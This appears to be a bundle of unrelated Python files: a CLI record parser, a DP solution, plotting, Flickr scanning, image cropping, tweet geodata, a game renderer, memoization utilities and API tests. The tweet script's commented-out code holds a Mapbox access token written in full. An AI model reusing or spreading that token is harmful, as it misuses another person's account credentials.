        # __check_parameters__.
        self.parameters = {}
        self.parameters['version'] = accounting.get_version()
        self.parameters['output_location'] = '.'
        self.parameters['ZoneName'] = 'EU'
        self.parameters['TimeZone'] = 'UTC'
    def __do_parsing__(self):
        # Parse sys.argv; prints usage and exits on malformed options.
        try:
            opts, args = getopt.getopt(sys.argv[1:],
                                       "s:z:t:o:",
                                       ["help", "version",
                                        "sitename=", "zonename=", "timezone=", "outputlocation="])
        except getopt.GetoptError, err:
            print str(err)
            usage.get_usage(self.parameters)
            sys.exit(2)
        for opt, value in opts:
            # NOTE(review): ("--help") is a plain string, not a tuple, so
            # `in` is a substring test here -- works for these exact
            # options but is fragile; same for ("--version").
            if opt in ("--help"):
                usage.get_usage(self.parameters)
                sys.exit(0)
            elif opt in ("--version"):
                print self.parameters['version']
                sys.exit(0)
            elif opt in ("-s", "--sitename"):
                self.parameters['SiteName'] = value.strip()
            elif opt in ("-z", "--zonename"):
                self.parameters['ZoneName'] = value.strip()
            elif opt in ("-t", "--timezone"):
                self.parameters['TimeZone'] = value.strip()
            elif opt in ("-o", "--outputlocation"):
                self.parameters['output_location'] = value.strip()
            else:
                msg = 'The specified %s option is not recognized' % str(opt)
                raise ParsingError(msg)
    def __check_parameters__(self):
        # SiteName must be present (KeyError branch) and non-empty.
        try:
            if self.parameters['SiteName'] == '':
                msg = ('The input %s cannot be empty. '
                       % 'SiteName'.lower() +
                       'Please use the option --help')
                raise InputError(msg)
        except KeyError, err:
            msg = ('The input arguments are not provided. ' +
                   'Please use the option --help')
            raise InputError(msg)
    def get_parameters(self):
        """Parse and validate argv, then return the parameters dict."""
        self.__do_parsing__()
        self.__check_parameters__()
        return self.parameters
if __name__ == '__main__':
    try:
        parameters = Parser().get_parameters()
        #set image_lists needs to be substitute with calls to the NS and CM
        #due to a temporary issue in the testbed the calls will be added later
        image_lists = [('vm0','Pending','cloud','cloud',0,0)]
        # DS: doc? what is this tuple supposed to mean?
        build_requests = requests.Requests()
        for request in image_lists:
            build_requests.add_request(request=request)
        records = []
        for image in build_requests.get_images():
            # Build one accounting record per image.
            # NOTE(review): LocalUserId is filled from image['LocalGroupId']
            # -- looks like a copy/paste slip; confirm against record_format.
            record = record_format.RecordFormat(SiteName=parameters['SiteName'],
                                                ZoneName=parameters['ZoneName'],
                                                TimeZone=parameters['TimeZone'],
                                                MachineName=image['MachineName'],
                                                Status=image['Status'],
                                                LocalUserId=image['LocalGroupId'],
                                                LocalGroupId=image['LocalGroupId'],
                                                StartTime=image['StartTime'],
                                                EndTime=image['EndTime'])
            records.append(record.get_information())
        build_message = message_format.MessageFormat(records_list=records)
        build_message.store_in_file(parameters['output_location'])
    except KeyError, err:
        print err, '\n'
    except InputError, err:
        print err, '\n'
    except ParsingError, err:
        print err, '\n'
    except requests.RequestsError, err:
        print err, '\n'
    except MessageStoreError, err:
        # NOTE(review): MessageStoreError is neither imported nor defined in
        # this module -- reaching this clause would raise NameError; it
        # likely lives in message_format. Confirm.
        print err, '\n'
    except KeyboardInterrupt:
        # NOTE(review): message text looks garbled ("Execution n!").
        print '\n\nExecution n!'
        sys.exit(1)
|
class Solution:
    def mincostTickets(self, days: List[int], costs: List[int]) -> int:
        """Minimum total cost of 1/7/30-day passes covering all travel days.

        Bottom-up DP over calendar days: dp[d] is the cheapest way to cover
        every travel day up to and including day d.
        """
        DAY_1, DAY_7, DAY_30 = 0, 1, 2   # indices into costs
        NO_TRAVEL = -1                   # sentinel marking a non-travel day
        last_day = days[-1]

        # dp[d] stays NO_TRAVEL until day d is processed below.
        dp = [NO_TRAVEL] * (last_day + 1)
        dp[0] = 0                        # nothing to pay before travelling
        for d in days:
            dp[d] = 0                    # mark the travel days

        for d in range(1, last_day + 1):
            if dp[d] == NO_TRAVEL:
                # Not travelling today: cost carries over unchanged.
                dp[d] = dp[d - 1]
            else:
                # Travelling today: cheapest of a 1-, 7-, or 30-day pass
                # whose coverage window ends today.
                dp[d] = min(dp[d - 1] + costs[DAY_1],
                            dp[max(d - 7, 0)] + costs[DAY_7],
                            dp[max(d - 30, 0)] + costs[DAY_30])

        # Cost on the last travel day is the answer.
        return dp[last_day]
#!/usr/bin/env python
import pandas as pd
from rpy2 import robjects
import rpy2.robjects.lib.ggplot2 as gg2
from rpy2.robjects.packages import importr
import pandas.rpy.common as common
# Bind commonly used R functions to Python names via rpy2, and make sure
# ggplot2 is loaded in the embedded R session.
require = robjects.r['require']
require('ggplot2')
pdf = robjects.r['pdf']
grdevices = importr('grDevices')
dev_off = robjects.r['dev.off']
ordered = robjects.r['ordered']
ggtitle = robjects.r['ggtitle']
xlabel = robjects.r['xlab']
ylabel = robjects.r['ylab']
seq = robjects.r['seq']
def line_plot(pdf_file, data, x, y, var,
              null_label="N/A",
              linetype = None,
              title=None,
              xlab=None,
              ylab=None,
              colorname=None,
              linename=None,
              **extra_aes_params):
    """Render a ggplot2 point+path plot of *data* to *pdf_file* via rpy2.

    Args:
        pdf_file: output path for the landscape-A4 PDF.
        data: pandas DataFrame holding the columns named below.
            NOTE(review): mutated in place (x, 'group', 'sortcol' columns
            may be rewritten) -- pass a copy if the caller reuses it.
        x, y: column names for the axes.
        var: column used for the colour grouping.
        null_label: label substituted for missing x values.
        linetype: optional column for the line-type grouping.
        title, xlab, ylab: optional labels (default to the column names).
        colorname, linename: optional legend titles.
    """
    pdf(pdf_file, width=11.7, height=8.3, paper="a4r")

    if any(data[x].isnull()):
        # Missing x values: relabel them with null_label, then sort so the
        # null category sorts first in the ordered factor built below.
        # NOTE(review): `[null_label] + map(...)` only concatenates on
        # Python 2; this module targets the old pandas.rpy/Python 2 stack.
        labels = [null_label] + map(str, sorted(set(data[data[x].notnull()][x])))
        labels = robjects.StrVector(labels)
        nulls = data[x].isnull()
        label_vals = dict(zip(labels, range(len(labels))))

        data[x] = data[x].astype("str")
        data[x][nulls] = null_label
        data['sortcol'] = data[x].map(label_vals.__getitem__)
        # NOTE(review): DataFrame.sort() was removed in modern pandas
        # (sort_values replaces it) -- confirm the pinned pandas version.
        data.sort('sortcol', inplace=True)
    else:
        labels = None

    # Each (var, linetype) combination is drawn as its own connected path.
    if linetype and linetype != var:
        data['group'] = data[var].map(str) + data[linetype].map(str)
    else:
        data['group'] = data[var]

    rdata = common.convert_to_r_dataframe(data)
    if labels:
        # Re-level the x column as an ordered R factor so ggplot keeps the
        # label order constructed above.
        ix = rdata.names.index(x)
        rdata[ix] = ordered(rdata[ix], levels=labels)
    gp = gg2.ggplot(rdata)
    pp = (gp + gg2.geom_point(size=3) +
          gg2.scale_colour_hue(name=(colorname or var)) +
          #gg2.scale_colour_continuous(low="black") +
          gg2.aes_string(x=x, y=y, color=var, variable=var) +
          ggtitle(title or "") +
          xlabel(xlab or x) +
          ylabel(ylab or y) #+
          #gg2.scale_y_continuous(breaks=seq(0.0, 1.0, 0.05))
          )

    # line type stuff
    if linetype:
        pp += gg2.geom_path(gg2.aes_string(group='group', linetype=linetype), size=0.5)
        pp += gg2.scale_linetype(name=(linename or linetype))
    else:
        pp += gg2.geom_path(gg2.aes_string(group='group'), size=0.5)

    pp.plot()
    dev_off()
|
from argparse import ArgumentParser
from multiprocessing.pool import ThreadPool
from threading import Lock
from typing import Text
import pendulum
from django.contrib.gis.geos import Point
from django.core.management import BaseCommand
from django.db.transaction import atomic
from tqdm import tqdm
from ...flickr import Flickr
from ...models import Area, Image, Tile
class Command(BaseCommand):
    """
    This is where the scanning of the whole Flickr database happens.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Serializes the DB-write section of handle_tile(); tiles run in a
        # thread pool but inserts happen one tile at a time.
        self.insert_lock = Lock()

    def get_area(self, slug: Text) -> Area:
        """
        Transforms an area slug into a real area object. To be used by the
        arguments parser.

        Raises ValueError (reported by argparse as an invalid argument) when
        no matching Area exists.
        """
        try:
            # NOTE(review): the lookup uses `name` although the parameter is
            # called `slug` — confirm Area has no distinct slug field.
            return Area.objects.get(name=slug)
        except Area.DoesNotExist:
            raise ValueError(f'No area with the name "{slug}" exist.')

    def add_arguments(self, parser: ArgumentParser):
        # `type=self.get_area` converts the CLI string straight into an Area.
        parser.add_argument(
            "-a", "--area", help="Name of the area to parse", type=self.get_area
        )

    def handle(self, area: Area, *args, **options):
        """
        Root function. It will simply scan one by one each level until the max
        depth is reached.
        """
        try:
            print(f'Getting content for "{area}"')
            # Scan shallow-to-deep; handle_tile() creates the children that the
            # next level's iteration will probe.
            for level in range(0, Tile.MAX_DEPTH + 1):
                self.handle_level(level, area)
        finally:
            # Always stop the API-key rotation machinery, even on error.
            f = Flickr.instance()
            f.stop_generating_keys()

    def handle_level(self, level: int, area: Area) -> None:
        """
        Handles a single level. It will evaluate all the tiles found in this
        level. If the tile intersects the scanned area then the tile is
        handled, otherwise the scanning is deferred to another scan which would
        require this tile to be scanned.
        Notes
        -----
        As the Flickr API is fairly slow and the amount of data to download is
        pretty big, the Flickr class allows for:
        - Rotating API keys in order to increase the rate limit a little bit
        - Being called from several threads but still maintain the rate limit
          on each key
        The parallelism happens at the tiles level: a thread pool will run each
        tile in a separate thread.
        """
        print("")
        print(f"--> Level {level}")
        tiles = Tile.objects.filter(depth=level, status=Tile.TO_PROBE).order_by(
            "y", "x"
        )

        # Local wrapper (deliberately shadows the method name): only tiles
        # intersecting the requested area are actually processed.
        def handle_tile(tile: Tile):
            if tile.polygon.intersects(area.area):
                self.handle_tile(tile)

        # 3 workers per API key keeps each key saturated without oversubscribing.
        with ThreadPool(Flickr.instance().keys_count * 3) as pool:
            for _ in tqdm(
                pool.imap_unordered(handle_tile, tiles),
                total=tiles.count(),
                unit="tile",
                smoothing=0.01,
            ):
                pass

    def handle_tile(self, tile: Tile):
        """
        Basically, for each tile two things can happen: either the tile has
        less than MAX_SEARCH_RESULTS search results (the value is empirical
        to give good results with the Flickr API which is working more or less
        will under such extreme conditions), either the tile has more in which
        case it needs to be split.
        If the tile needs to be split then children are created and they will
        be scanned when moving down to the next level.
        There is one specificity though: if the children were not created
        because the max depth has been reached, then we gather the first
        MAX_SEARCH_RESULTS items and mark the tile as done. Tiles with such
        an image density will stand out either way.
        """
        f = Flickr.instance()
        kwargs = {
            "bbox": tile.bbox,
            "extras": ["geo", "date_taken", "url_q", "url_z", "url_b", "count_faves"],
        }
        # First page doubles as the probe for the total result count.
        info = f.search(page=1, **kwargs)
        harvest = True
        if int(info["photos"]["total"]) > Flickr.MAX_SEARCH_RESULTS:
            # Too many results: only harvest anyway if we cannot split further.
            harvest = not tile.can_have_children
        seen = set()
        to_insert = []
        if harvest:
            # Cap the page count at MAX_SEARCH_RESULTS worth of pages.
            for page in range(
                0,
                min(
                    int(info["photos"]["pages"]),
                    int(Flickr.MAX_SEARCH_RESULTS / Flickr.PER_PAGE),
                ),
            ):
                if page == 0:
                    # Page 1 was already fetched above; reuse it.
                    photos = info
                else:
                    photos = f.search(page=page + 1, **kwargs)
                assert len(photos["photos"]["photo"]) <= Flickr.PER_PAGE
                # De-duplicate by photo id (the API can repeat items across pages).
                for photo in photos["photos"]["photo"]:
                    photo_id = int(photo["id"])
                    if photo_id not in seen:
                        seen.add(photo_id)
                        to_insert.append(photo)

        def make_images():
            """
            This is done in a generator because sometimes you might get
            a parsing error on an image, in which case you don't want
            a single image to crash the whole thing.
            """
            # NB: `existing` is a closure over the variable assigned in the
            # locked block below; the generator is only consumed (by
            # bulk_create) after that assignment has happened.
            for image in to_insert:
                try:
                    if int(image["id"]) not in existing:
                        yield Image(
                            flickr_id=int(image["id"]),
                            coords=Point(
                                (float(image["longitude"]), float(image["latitude"]))
                            ),
                            date_taken=pendulum.parse(image["datetaken"], tz="UTC"),
                            data=image,
                            faves=int(image.get("count_faves", 0)),
                        )
                except (ValueError, TypeError):
                    # Unparseable photo record: skip it silently (best effort).
                    pass

        # Writes are serialized across worker threads and done atomically.
        with self.insert_lock, atomic():
            if not harvest:
                tile.need_children()
            else:
                # Only insert photos we do not already have.
                existing = set(
                    Image.objects.filter(flickr_id__in=seen).values_list(
                        "flickr_id", flat=True
                    )
                )
                Image.objects.bulk_create(make_images())
            tile.mark_done()
|
"""
Created by Alex Wang on 2018-06-01
"""
import os
import sys
import traceback
from collections import Counter
import time
import cv2
import numpy as np
def crop_image(img, debug=False, plot=False):
    """Detect and crop a near-white border around an image.

    The image is downscaled by `ratio`, thresholded so near-white (>240)
    pixels become 255, flood-filled with gray (128) from seed points along
    the horizontal mid-line, and the bounding box of the gray (content)
    region — scaled back up — is cut out of the original image.

    :param img: BGR image as returned by cv2.imread.
    :param debug: print sizes, bounds and per-stage timings.
    :param plot: show intermediate images in cv2 windows (blocks on a key).
    :return: (cropped_image, True) on success; (None, False) when the white
             border is implausibly large or any error occurs.
    """
    try:
        ratio = 4  # work on a 1/4-scale copy for speed; bounds are scaled back later
        time_one = time.time()
        img_resize = cv2.resize(img, (0, 0), fx=1.0/ratio, fy=1.0/ratio)
        img_org = img.copy()
        img_gray = cv2.cvtColor(img_resize, cv2.COLOR_BGR2GRAY)
        ret, img_mask = cv2.threshold(img_gray, 240, 255, cv2.THRESH_BINARY)
        height, width = img_resize.shape[0:2]
        # floodFill requires a mask 2 pixels larger than the image on each side.
        mask = np.zeros([height + 2, width + 2, 1], np.uint8)
        time_two = time.time()
        flood_y = int(height / 2)
        # Seed flood fills every 10 px along the middle row, skipping 50 px margins.
        for x in range(50, width - 50, 10):
            # print(img_mask[y, flood_x])
            # Punch a small black dot so the seed sits on a non-white pixel.
            cv2.circle(img_mask, (x, flood_y), 2, 0, thickness=3)
            # print(img_mask[x, flood_y])
            if img_mask[flood_y, x] == 0:
                # NOTE(review): cv2.FLOODFILL_MASK_ONLY is passed positionally in
                # the loDiff slot rather than as flags=; as a result the image
                # itself IS painted with 128, which the argwhere below relies
                # on — confirm this is the intended call.
                cv2.floodFill(img_mask, mask, (x, flood_y), 128, cv2.FLOODFILL_MASK_ONLY)
        time_three = time.time()
        # Coordinates of all flood-filled pixels; each row is (row, col).
        gray_idx = np.argwhere(img_mask == 128)
        print(len(gray_idx))
        time_four = time.time()
        # print(gray_idx)
        # NOTE: here "x" denotes the row (vertical) index and "y" the column,
        # matching the img_org[min_x*ratio:max_x*ratio, ...] slicing below.
        x_idx, y_idx = zip(*gray_idx)
        # min_x = min(x_idx)
        # max_x = max(x_idx)
        # min_y = min(y_idx)
        # max_y = max(y_idx)
        # Ignore rows/columns with 10 or fewer filled pixels to suppress noise.
        x_counter = Counter(x_idx)
        x_counter_filter = {key: value for key, value in x_counter.items() if value > 10}
        y_counter = Counter(y_idx)
        y_counter_filter = {key: value for key, value in y_counter.items() if value > 10}
        min_x = min(x_counter_filter.keys())
        max_x = max(x_counter_filter.keys())
        min_y = min(y_counter_filter.keys())
        max_y = max(y_counter_filter.keys())
        # Scale low-res bounds back to original resolution and crop.
        img_new = img_org[min_x * ratio:max_x * ratio, min_y * ratio:max_y * ratio, :]
        if debug:
            print('img height:{}, img width:{}'.format(height, width))
            print('min_x:{}, max_x:{}, min_y:{}, max_y:{}'.format(min_x, max_x, min_y, max_y))
        time_five = time.time()
        # A crop is only trusted if the removed border is reasonably small.
        height_threshold = int(height * 0.12)
        width_threshold = int(width * 0.1)
        if debug:
            print('threshold cost time:{}, flood fill cost time:{}, argwhere cost time:{}, '
                  'counter cost time:{}'.
                  format((time_two - time_one), (time_three - time_two),
                         (time_four - time_three), (time_five - time_four)))
            print('height_threshold:{}, width_threshold:{}'.format(height_threshold, width_threshold))
        if plot:
            cv2.imshow('img_org', img)
            cv2.imshow('img_mask', img_mask)
            cv2.imshow('img_new', img_new)
            cv2.waitKey(0)
            cv2.destroyAllWindows()
        if min_x > height_threshold or (height - max_x) > height_threshold \
                or min_y > width_threshold or (width - max_y) > width_threshold:
            if debug:
                print('white edge too large, return None.')
            return None, False
        return img_new, True
    except Exception as e:
        # Broad catch: any failure (e.g. empty flood region) means "no crop".
        traceback.print_exc()
        return None, False
def test_batch(dir_path, debug=False, plot=False,
               save_dir='/Users/alexwang/data/image_split/white_edge_crop_result'):
    """Crop the white border of every image found in `dir_path`.

    Successfully cropped images are written to `save_dir` (created on demand)
    under their original file names.

    :param dir_path: directory containing the input images.
    :param debug: forwarded to crop_image; enables timing/threshold prints.
    :param plot: forwarded to crop_image; shows cv2 windows when True.
    :param save_dir: output directory (new, backward-compatible parameter;
                     defaults to the previously hard-coded path).
    """
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)
    # NOTE: the previous hard-coded `file_name_list` assignments were dead code
    # (the loop always iterated os.listdir) and have been removed.
    for file_name in os.listdir(dir_path):
        file_path = os.path.join(dir_path, file_name)
        print('file_path:', file_path)
        img = cv2.imread(file_path)
        if img is None:
            # cv2.imread returns None for unreadable / non-image files;
            # skip them instead of letting crop_image print a traceback.
            print('cannot read image, skip:', file_path)
            continue
        start_time = time.time()
        img_result, succeed = crop_image(img, debug, plot)
        end_time = time.time()
        print('cost time:{}'.format(end_time - start_time))
        if succeed:
            cv2.imwrite(os.path.join(save_dir, file_name), img_result)
if __name__ == '__main__':
    # Batch-crop every image in the input directory; debug prints on, no GUI.
    test_batch('/Users/alexwang/data/image_split/white_edge_data', debug=True, plot=False)
|
import json
import pandas as pd
from collections import OrderedDict
import plotly.express as px
# Read one tweet JSON object per line and collect coarse geo information
# (one bounding-box corner plus place names) into parallel lists.
data = {'lat': [], 'long': [], 'city': [], 'state': [], 'country': []}
input_path = 'opiates_2020_3_1_.txt'
with open(input_path, 'r') as f:
    # Stream line by line instead of loading the whole file with readlines().
    for line in f:
        jo = json.loads(line.strip(), object_pairs_hook=OrderedDict)
        try:
            # BUG FIX: extract every value BEFORE appending. Previously a
            # TypeError raised mid-way (e.g. 'place' is null) left some lists
            # one element longer than others, desynchronizing the columns.
            place = jo['place']
            corner = place['bounding_box']['coordinates'][0][0]
            name_parts = place['full_name'].split(',')
            longitude, latitude = corner[0], corner[1]
            city, state = name_parts[0], name_parts[1]
            country = place['country_code']
        except TypeError:
            # Tweets without geo info have place == null; keep rows aligned.
            longitude = latitude = city = state = country = None
        data['long'].append(longitude)
        data['lat'].append(latitude)
        data['city'].append(city)
        data['state'].append(state)
        data['country'].append(country)
# data_df = pd.DataFrame.from_dict(data).dropna()
# px.set_mapbox_access_token('pk.eyJ1IjoidGFubW95c3IiLCJhIjoiY2s5aDc2cjZoMHMzMTNscGhtcTA0MHZkOSJ9.ElGEgw3N2aEk1hFLjB7vng')
# # df = px.data.carshare()
# # fig = px.scatter_mapbox(df, lat="centroid_lat", lon="centroid_lon", color="peak_hour", size="car_hours",
# #                   color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10)
#
# fig = px.scatter_mapbox(data_df, lat="lat", lon="long",color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10)
# fig.show() |
from pyglet.gl import *
from creatures import Wall
from animation_example import Tween, ease_none, ease_in_quad
class Render(object):
    def __init__(self, game_data):
        """
        width, height: dimension in tiles
        background: background image to use
        """
        # NOTE(review): the docstring above describes parameters this
        # constructor no longer takes; everything is read from game_data.
        self.window = game_data["window"]
        self.game_data = game_data
        self.game = game_data["game"]
        # Mirror the window size so callers can query it from the renderer.
        self.width = self.window.width
        self.height = self.window.height
        # Register with the game so on_draw() gets dispatched.
        self.game.add_handler(self)
        # Demo sprite plus two tweens animating it along x and y.
        # NOTE(review): `pyglet.sprite` is presumably reachable through the
        # `from pyglet.gl import *` star import — confirm.
        self.sprite = pyglet.sprite.Sprite(self.game_data['data']['agents']['Monster01']['animations']['Monster_Up1.png'], 100, 100)
        self.Tween = Tween(self.sprite, "x", ease_in_quad, self.sprite.x, self.sprite.x+200, 5, True, False, "Testobj1")
        self.Tween2 = Tween(self.sprite, "y", ease_none, self.sprite.y, self.sprite.y+100, 10, True, False, "Testobj2")
        self.Tween.start()
        self.Tween2.start()

    #def __init__(self, obj, prop, func, begin, finish, duration, use_seconds, looping=False, name=None)
    def on_draw(self):
        # Reset colour so batched geometry is not tinted by earlier draws.
        glColor3f(1.0, 1.0, 1.0)
        glPushMatrix()
        #Tile.tile_batch.draw()
        #EffectsManager.effects_batch.draw()
        #Bug.bug_batch.draw()
        Wall.object_batch.draw()
        self.sprite.draw()
        #Creature.creature_batch.draw()
        #Add in animation code
        glPopMatrix()
        glLoadIdentity()
|
import random as rand
# Read integers, build a same-length random resample (with replacement), and
# report the fraction of positions where the resample matches the original.
testcase = list(map(int, input("Enter the list of integers : ").split()))

# Every value must lie in [5, 100]; an empty list is also rejected
# (ROBUSTNESS FIX: previously empty input crashed on randint(0, -1) and on
# the division by len(testcase)).
valid = bool(testcase) and all(5 <= value <= 100 for value in testcase)

if valid:
    # Sample with replacement from the original list.
    random_list = [rand.choice(testcase) for _ in testcase]
    # Fraction of indices where the resample equals the original.
    ans = sum(a == b for a, b in zip(testcase, random_list)) / len(testcase)
    print(random_list)
    print(ans)
else:
    print("-1")
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import functools
import inspect
from contextlib import contextmanager
from typing import Any, Callable, Optional, TypeVar
from pants.util.meta import T, classproperty
# Shape of any callable; F is a TypeVar bound to it so decorators can declare
# that they return the same callable type they were given.
FuncType = Callable[..., Any]
F = TypeVar("F", bound=FuncType)
# Sentinel tuple marking where positional args end and sorted kwargs begin, so
# a tuple passed positionally can never collide with a kwargs-derived encoding.
_kwargs_separator = (object(),)


def equal_args(*args, **kwargs):
    """A memoized key factory that compares the equality (`==`) of a stable sort of the
    parameters."""
    if not kwargs:
        return args
    return args + _kwargs_separator + tuple(sorted(kwargs.items()))
class InstanceKey:
    """An equality wrapper for an arbitrary object instance.

    Uses `id` / `is` for fast `__hash__` and `__eq__`. Both rely on the wrapped
    object not being garbage collected (ids of dead objects can be recycled),
    so a strong reference to the instance is retained for the key's lifetime.
    """

    def __init__(self, instance):
        # Strong reference: keeps the id() stable for as long as the key lives.
        self._instance = instance
        self._hash = id(instance)

    def __hash__(self):
        return self._hash

    def __eq__(self, other):
        if self._instance is other:
            return True
        return isinstance(other, InstanceKey) and self._instance is other._instance
def per_instance(*args, **kwargs):
    """A memoized key factory that works like `equal_args` except that the first parameter's
    identity is used when forming the key.

    This is a useful key factory when you want to enforce memoization happens per-instance for an
    instance method in a class hierarchy that defines a custom `__hash__`/`__eq__`.
    """
    head, tail = args[0], args[1:]
    return equal_args(InstanceKey(head), *tail, **kwargs)
def memoized(func: Optional[F] = None, key_factory=equal_args, cache_factory=dict) -> F:
    """Memoizes the results of a function call.

    By default, exactly one result is memoized for each unique combination of function arguments.
    Note that memoization is not thread-safe and the default result cache will grow without bound;
    so care must be taken to only apply this decorator to functions with single threaded access and
    an expected reasonably small set of unique call parameters.

    The wrapped function carries 3 helper attributes:
    + `put(*args, **kwargs)`: A context manager taking the same arguments as the memoized
                              function; yields a setter that stores a value in the cache.
    + `forget(*args, **kwargs)`: Takes the same arguments as the memoized function and drops
                                 the cached value, if any, for those arguments.
    + `clear()`: Fully clears the memoization cache.

    :API: public
    :param func: The function to wrap. Only generally passed by the python runtime and should be
                 omitted when passing a custom `key_factory` or `cache_factory`.
    :param key_factory: A function that can form a cache key from the arguments passed to the
                        wrapped, memoized function; by default uses simple parameter-set equality;
                        ie `equal_args`.
    :param cache_factory: A no-arg callable that produces a mapping object to use for the memoized
                          method's value cache. By default the `dict` constructor, but could be a
                          a factory for an LRU cache for example.
    :raises: `ValueError` if the wrapper is applied to anything other than a function.
    :returns: A wrapped function that memoizes its results or else a function wrapper that does this.
    """
    if func is None:
        # Decorator-factory form: the user supplied args (`@memoized(...)`).
        # Curry the configuration so the decorator machinery can call us again
        # with the target function. This is what lets both `@memoized` and
        # `@memoized(...params...)` application forms work.
        return functools.partial(  # type: ignore[return-value]
            memoized, key_factory=key_factory, cache_factory=cache_factory
        )
    if not inspect.isfunction(func):
        raise ValueError("The @memoized decorator must be applied innermost of all decorators.")

    make_key = key_factory or equal_args
    results = cache_factory() if cache_factory else {}

    @functools.wraps(func)
    def memoize(*args, **kwargs):
        cache_key = make_key(*args, **kwargs)
        if cache_key not in results:
            results[cache_key] = func(*args, **kwargs)
        return results[cache_key]

    @contextmanager
    def put(*args, **kwargs):
        cache_key = make_key(*args, **kwargs)
        yield functools.partial(results.__setitem__, cache_key)

    memoize.put = put  # type: ignore[attr-defined]

    def forget(*args, **kwargs):
        cache_key = make_key(*args, **kwargs)
        if cache_key in results:
            del results[cache_key]

    memoize.forget = forget  # type: ignore[attr-defined]

    def clear():
        results.clear()

    memoize.clear = clear  # type: ignore[attr-defined]
    return memoize  # type: ignore[return-value]
def memoized_method(func: Optional[F] = None, key_factory=per_instance, cache_factory=dict) -> F:
    """A convenience wrapper for memoizing instance methods.

    A memoized instance method is usually expected to cache per class instance; but for classes
    with a custom `__hash__`/`__eq__` that can hash distinct instances the same, plain `@memoized`
    would share cached values across `==` instances. This wrapper defaults the cache key to
    `per_instance` to restore the expected per-instance behavior.

    Applied like so:
    >>> class Foo:
    ...   @memoized_method
    ...   def name(self):
    ...     pass

    Is equivalent to:
    >>> class Foo:
    ...   @memoized(key_factory=per_instance)
    ...   def name(self):
    ...     pass

    :API: public
    :param func: The function to wrap. Only generally passed by the python runtime and should be
                 omitted when passing a custom `key_factory` or `cache_factory`.
    :param key_factory: A function that can form a cache key from the arguments passed to the
                        wrapped, memoized function; by default `per_instance`.
    :param kwargs: Any extra keyword args accepted by `memoized`.
    :raises: `ValueError` if the wrapper is applied to anything other than a function.
    :returns: A wrapped function that memoizes its results or else a function wrapper that does this.
    """
    wrapped = memoized(func=func, key_factory=key_factory, cache_factory=cache_factory)
    return wrapped
def memoized_property(
    func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
    """A convenience wrapper for memoizing properties.

    Applied like so:
    >>> class Foo:
    ...   @memoized_property
    ...   def name(self):
    ...     pass

    Is equivalent to:
    >>> class Foo:
    ...   @property
    ...   @memoized(key_factory=per_instance)
    ...   def name(self):
    ...     pass

    A deleter is installed that un-caches the value, so a later access re-computes it.
    For example, with a @memoized_property `now`:
    >>> import time
    >>> class Bar:
    ...   @memoized_property
    ...   def now(self):
    ...     return time.time()

    >>> bar = Bar()
    >>> bar.now
    1433267312.622095
    >>> time.sleep(5)
    >>> bar.now
    1433267312.622095
    >>> del bar.now
    >>> bar.now
    1433267424.056189
    >>> time.sleep(5)
    >>> bar.now
    1433267424.056189
    >>>

    :API: public
    :param func: The property getter method to wrap. Only generally passed by the python runtime and
                 should be omitted when passing a custom `key_factory` or `cache_factory`.
    :param key_factory: A function that can form a cache key from the arguments passed to the
                        wrapped, memoized function; by default `per_instance`.
    :param kwargs: Any extra keyword args accepted by `memoized`.
    :raises: `ValueError` if the wrapper is applied to anything other than a function.
    :returns: A read-only property that memoizes its calculated value and un-caches its value when
              `del`ed.
    """
    cached_getter = memoized_method(func=func, key_factory=key_factory, cache_factory=cache_factory)

    def _forget(self):
        # Un-cache this instance's value so the next access re-computes it.
        return cached_getter.forget(self)  # type: ignore[attr-defined, no-any-return]

    return property(fget=cached_getter, fdel=_forget)  # type: ignore[return-value]
# TODO[13244]: fix type hint issue when using @memoized_classmethod and friends
def memoized_classmethod(
    func: Optional[F] = None, key_factory=per_instance, cache_factory=dict
) -> F:
    """Memoize a classmethod: the memoized function is wrapped in `classmethod` last."""
    method = memoized_method(func, key_factory=key_factory, cache_factory=cache_factory)
    return classmethod(method)  # type: ignore[return-value]
def memoized_classproperty(
    func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
    """Memoize a `classproperty`: a `memoized_classmethod` exposed as a class-level property."""
    cached = memoized_classmethod(func, key_factory=key_factory, cache_factory=cache_factory)
    return classproperty(cached)
def testable_memoized_property(
    func: Optional[Callable[..., T]] = None, key_factory=per_instance, cache_factory=dict
) -> T:
    """A variant of `memoized_property` that allows for setting of properties (for tests, etc)."""
    cached_getter = memoized_method(func=func, key_factory=key_factory, cache_factory=cache_factory)

    def _set(self, val):
        # Store `val` in the memoization cache under this instance's key.
        with cached_getter.put(self) as putter:
            putter(val)

    def _forget(self):
        return cached_getter.forget(self)  # type: ignore[attr-defined, no-any-return]

    return property(fget=cached_getter, fset=_set, fdel=_forget)  # type: ignore[return-value]
|
import json
from urllib.parse import urlencode
from tornado.httputil import HTTPHeaders
from tests import BasicTestsClass, login_data_admin_valid, registry_new_user, login_data_user_valid
class TestsAdminMethods(BasicTestsClass):
    """ Test case for the administrator endpoints.
    """
    def setUp(self) -> None:
        super().setUp()
        # Build a request header carrying the administrator's auth token.
        response = self.fetch('/v1/user/auth', method="POST", body=urlencode(login_data_admin_valid))
        response_json = json.loads(response.body)
        self.headers = HTTPHeaders({'auth-token': response_json['auth-token']})
    def test_v1_admin_delete_user(self):
        # Deleting an existing user with an admin token succeeds.
        response = self.fetch('/v1/admin/delete_user', method="POST",
                              body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
        response_json = json.loads(response.body)
        self.assertEqual(response.code, 200)
        self.assertEqual(response_json['status'], 'success')
    def test_v1_admin_delete_user_again(self):
        # Deleting the same user a second time yields 404.
        # NOTE(review): this appears to rely on unittest's alphabetical method
        # ordering running ..._delete_user before ..._delete_user_again —
        # confirm the fixture state makes this deterministic.
        response = self.fetch('/v1/admin/delete_user', method="POST",
                              body=urlencode({'email': registry_new_user['email']}), headers=self.headers)
        response_json = json.loads(response.body)
        self.assertEqual(response.code, 404)
        self.assertEqual(response_json['type'], 'user_not_found')
    def test_v1_admin_delete_not_admin(self):
        # Build a header with a regular (non-admin) user's token.
        response = self.fetch('/v1/user/auth', method="POST", body=urlencode(login_data_user_valid))
        response_json = json.loads(response.body)
